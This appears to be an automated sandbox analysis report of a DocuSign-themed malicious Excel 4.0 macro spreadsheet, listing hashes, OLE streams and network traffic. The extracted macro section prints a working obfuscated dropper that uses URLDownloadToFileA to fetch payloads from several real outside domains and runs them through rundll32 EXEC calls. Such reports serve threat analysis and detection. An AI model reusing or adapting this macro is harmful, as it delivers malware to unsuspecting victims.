Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2300 |
Entropy (8bit): | 4.654213571979597 |
Encrypted: | false |
SSDEEP: | 48:8WK1/F+R3HVF8pB6pWK1/F+R3HVF8pB6:8Ff6H8pKFf6H8p |
MD5: | 6CE24E47B88D8ED0380A85F11DC331B4 |
SHA1: | 0609005F0D8C9B14109CB3D4792DE2824B5BB824 |
SHA-256: | 67F633A7382E5BA00488B61F8BA1DCA1F3A3F90A21187294173EE211FB0E5810 |
SHA-512: | 58263D0E991342D0292CF3251ECCA2E92A036AD9CDA913871CD78034D7216B1139FA586DE32B97A022B8CE5D6FCFFF83F83818E22A11F53EBA857D56B90053BC |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.664222086421206 |
Encrypted: | false |
SSDEEP: | 12:8ErMXU3uElPCH2YgcXPE3YcsqlJ0+WrjAZ/2bDDeLC5Lu4t2Y+xIBjKZm:8pgcXOdlkAZiDz87aB6m |
MD5: | 5DE43DFCF510EC94C5C28944111630D2 |
SHA1: | 1913CEE4AB5983FB2B00EBF318A98F7079326E5B |
SHA-256: | 07E557AA6595801D8EFB7A73A39317C26BB8302B7B4986A653D1979A2F536938 |
SHA-512: | B2C6A7BF332C5361C41EFD0FADAD382DE773CE3D14D3F20A9EB4903B7F8CB1E0D6083BCBDA6608AAB7DC599ACBBE90C7EAB6827333C43DAF9A81C11445D1930A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152 |
Entropy (8bit): | 4.661078402497766 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMYlIFc7FXa+1lIFc7FXamMYlIFc7FXav:dj6YlycZtlycZMYlycZU |
MD5: | 44EF8DDBAA84E0410A000AC715DF4B24 |
SHA1: | EA46B84FFE9DB049C77EA50E5E3BB02C3EC523D5 |
SHA-256: | 976B865F247F1FCD9555213FC0B6D702B9FFC050D42A46AF56492C16B81D5912 |
SHA-512: | 46ABB9CAB43385DDFD433C6CF4035DE59DB53454018CFBABF92933066050447B265672FCA4EB94F94DFF0AF1B555E132FEDDB17264325D7EACD54295059BBB1C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 111230 |
Entropy (8bit): | 6.668172188898463 |
Encrypted: | false |
SSDEEP: | 3072:5s8rmOAIyyzElBIL6lECbgBGzP5xLm7TdKojnGzeNf7jmGzeNfQaGzeNf/+s8rmd:q8rmOAIyyzElBIL6lECbgB+P5Nm7TdKX |
MD5: | 4E04F9F72397B3B758687899986998DC |
SHA1: | 16B81519271E5F3726D93BDEC4DAB856589D10D6 |
SHA-256: | C081FAA65265BD90138236337CA45F1BDCE683763B34EE84352451F956365666 |
SHA-512: | 8214A33E5B42DD175E5A8FC29FB36B1BB1B52717A705B6E270CED539FF939167DD1E15E1C3A11DD0FEF76E2935CEE2650ABB26DDB2500E635E6AD23EBFDD4704 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.697666945848156 |
TrID: |
|
File name: | Complaint-1992179913-02182021.xls |
File size: | 145920 |
MD5: | b2c46df91cfe891f61af65277461b32b |
SHA1: | fd329e179663a40c31f5c567228a59349928a6a5 |
SHA256: | 3b9790a911cff3e1572608f3cc377a3776c63014c4230eebc46b0a220f22b1f5 |
SHA512: | 809890b32a5f370054043a5abbbffdb45e1b1bf5e8f781d2f5537e26b9c5a171c450559e731ec6bbc5b798f3a131e94bb9f06d3523e7a362182b035203a6fcbb |
SSDEEP: | 3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/9:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOM0 |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74ecd4c6c3c6c4d8 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "Complaint-1992179913-02182021.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-18 13:42:21 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.321292606979 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.2746714277 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 135085 |
Entropy: | 3.69042254796 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . . |
Data Raw: | 09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,
,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 23, 2021 15:59:53.431101084 CET | 49717 | 80 | 192.168.2.3 | 72.52.227.180 |
Feb 23, 2021 15:59:53.588314056 CET | 80 | 49717 | 72.52.227.180 | 192.168.2.3 |
Feb 23, 2021 15:59:53.588403940 CET | 49717 | 80 | 192.168.2.3 | 72.52.227.180 |
Feb 23, 2021 15:59:53.589113951 CET | 49717 | 80 | 192.168.2.3 | 72.52.227.180 |
Feb 23, 2021 15:59:53.746191025 CET | 80 | 49717 | 72.52.227.180 | 192.168.2.3 |
Feb 23, 2021 15:59:54.049882889 CET | 80 | 49717 | 72.52.227.180 | 192.168.2.3 |
Feb 23, 2021 15:59:54.049967051 CET | 80 | 49717 | 72.52.227.180 | 192.168.2.3 |
Feb 23, 2021 15:59:54.050055027 CET | 49717 | 80 | 192.168.2.3 | 72.52.227.180 |
Feb 23, 2021 15:59:54.050091982 CET | 49717 | 80 | 192.168.2.3 | 72.52.227.180 |
Feb 23, 2021 15:59:54.051714897 CET | 49717 | 80 | 192.168.2.3 | 72.52.227.180 |
Feb 23, 2021 15:59:54.208895922 CET | 80 | 49717 | 72.52.227.180 | 192.168.2.3 |
Feb 23, 2021 15:59:54.218029022 CET | 49719 | 80 | 192.168.2.3 | 162.241.80.6 |
Feb 23, 2021 15:59:54.378669977 CET | 80 | 49719 | 162.241.80.6 | 192.168.2.3 |
Feb 23, 2021 15:59:54.378787041 CET | 49719 | 80 | 192.168.2.3 | 162.241.80.6 |
Feb 23, 2021 15:59:54.379425049 CET | 49719 | 80 | 192.168.2.3 | 162.241.80.6 |
Feb 23, 2021 15:59:54.538101912 CET | 80 | 49719 | 162.241.80.6 | 192.168.2.3 |
Feb 23, 2021 15:59:55.088042021 CET | 80 | 49719 | 162.241.80.6 | 192.168.2.3 |
Feb 23, 2021 15:59:55.088393927 CET | 49719 | 80 | 192.168.2.3 | 162.241.80.6 |
Feb 23, 2021 15:59:55.408802986 CET | 49720 | 80 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:55.753563881 CET | 80 | 49720 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 15:59:55.753705025 CET | 49720 | 80 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:55.754218102 CET | 49720 | 80 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:56.043920994 CET | 80 | 49720 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 15:59:56.826869011 CET | 80 | 49720 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 15:59:56.826890945 CET | 80 | 49720 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 15:59:56.826945066 CET | 49720 | 80 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:56.826972008 CET | 49720 | 80 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:56.833287954 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:57.119602919 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 15:59:57.119807959 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:57.305826902 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:57.591003895 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 15:59:57.592607975 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 15:59:57.592642069 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 15:59:57.592655897 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 15:59:57.592745066 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:57.592783928 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:57.775118113 CET | 49723 | 80 | 192.168.2.3 | 91.199.212.52 |
Feb 23, 2021 15:59:57.838704109 CET | 80 | 49723 | 91.199.212.52 | 192.168.2.3 |
Feb 23, 2021 15:59:57.838831902 CET | 49723 | 80 | 192.168.2.3 | 91.199.212.52 |
Feb 23, 2021 15:59:57.843202114 CET | 49723 | 80 | 192.168.2.3 | 91.199.212.52 |
Feb 23, 2021 15:59:57.904057026 CET | 80 | 49723 | 91.199.212.52 | 192.168.2.3 |
Feb 23, 2021 15:59:57.904131889 CET | 80 | 49723 | 91.199.212.52 | 192.168.2.3 |
Feb 23, 2021 15:59:57.904149055 CET | 80 | 49723 | 91.199.212.52 | 192.168.2.3 |
Feb 23, 2021 15:59:57.904233932 CET | 49723 | 80 | 192.168.2.3 | 91.199.212.52 |
Feb 23, 2021 15:59:57.915436983 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:58.200576067 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 15:59:58.200772047 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:58.758702040 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 15:59:59.084228039 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:00.088650942 CET | 80 | 49719 | 162.241.80.6 | 192.168.2.3 |
Feb 23, 2021 16:00:00.088712931 CET | 49719 | 80 | 192.168.2.3 | 162.241.80.6 |
Feb 23, 2021 16:00:01.838239908 CET | 80 | 49720 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:01.838433981 CET | 49720 | 80 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:04.803023100 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:04.803070068 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:04.803082943 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:04.803105116 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:04.803122044 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:04.803143024 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:04.803159952 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:04.803179979 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:04.803196907 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:04.803306103 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:04.803369045 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:04.803894997 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:04.803987026 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:04.805629969 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:04.805676937 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:04.813924074 CET | 49729 | 80 | 192.168.2.3 | 72.52.227.180 |
Feb 23, 2021 16:00:04.972908020 CET | 80 | 49729 | 72.52.227.180 | 192.168.2.3 |
Feb 23, 2021 16:00:04.973139048 CET | 49729 | 80 | 192.168.2.3 | 72.52.227.180 |
Feb 23, 2021 16:00:04.973792076 CET | 49729 | 80 | 192.168.2.3 | 72.52.227.180 |
Feb 23, 2021 16:00:05.088835955 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.088881016 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.088906050 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.088931084 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.088974953 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.089008093 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090002060 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090033054 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090065956 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090099096 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090104103 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090137005 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090147972 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090169907 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090173960 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090199947 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090221882 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090233088 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090256929 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090265036 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090293884 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090302944 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090310097 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090332985 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090363026 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090363026 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090394020 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090395927 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090419054 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090430975 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090441942 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090460062 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090487003 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090495110 CET | 443 | 49722 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:00:05.090522051 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.090542078 CET | 49722 | 443 | 192.168.2.3 | 138.36.237.100 |
Feb 23, 2021 16:00:05.132586956 CET | 80 | 49729 | 72.52.227.180 | 192.168.2.3 |
Feb 23, 2021 16:00:05.439776897 CET | 80 | 49729 | 72.52.227.180 | 192.168.2.3 |
Feb 23, 2021 16:00:05.439815998 CET | 80 | 49729 | 72.52.227.180 | 192.168.2.3 |
Feb 23, 2021 16:00:05.439996958 CET | 49729 | 80 | 192.168.2.3 | 72.52.227.180 |
Feb 23, 2021 16:00:05.440625906 CET | 49729 | 80 | 192.168.2.3 | 72.52.227.180 |
Feb 23, 2021 16:00:05.599416971 CET | 80 | 49729 | 72.52.227.180 | 192.168.2.3 |
Feb 23, 2021 16:00:30.088603973 CET | 80 | 49719 | 162.241.80.6 | 192.168.2.3 |
Feb 23, 2021 16:00:31.840473890 CET | 80 | 49720 | 138.36.237.100 | 192.168.2.3 |
Feb 23, 2021 16:01:02.904103994 CET | 80 | 49723 | 91.199.212.52 | 192.168.2.3 |
Feb 23, 2021 16:01:02.904526949 CET | 49723 | 80 | 192.168.2.3 | 91.199.212.52 |
Feb 23, 2021 16:01:02.904666901 CET | 49723 | 80 | 192.168.2.3 | 91.199.212.52 |
Feb 23, 2021 16:01:02.965517998 CET | 80 | 49723 | 91.199.212.52 | 192.168.2.3 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 23, 2021 15:59:35.010251045 CET | 50620 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:35.067208052 CET | 53 | 50620 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:35.953295946 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:36.004796028 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:36.131984949 CET | 60152 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:36.195096016 CET | 53 | 60152 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:36.975578070 CET | 57544 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:37.024276018 CET | 53 | 57544 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:38.285831928 CET | 55984 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:38.337155104 CET | 53 | 55984 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:39.673078060 CET | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:39.729824066 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:42.893322945 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:42.944856882 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:46.256175041 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:46.313365936 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:47.222956896 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:47.301136017 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:47.642052889 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:47.692135096 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:47.865226030 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:47.926132917 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:48.853673935 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:48.912281990 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:49.869901896 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:49.927014112 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:50.409563065 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:50.458177090 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:51.688054085 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:51.740336895 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:51.885790110 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:51.943526983 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:53.371618986 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
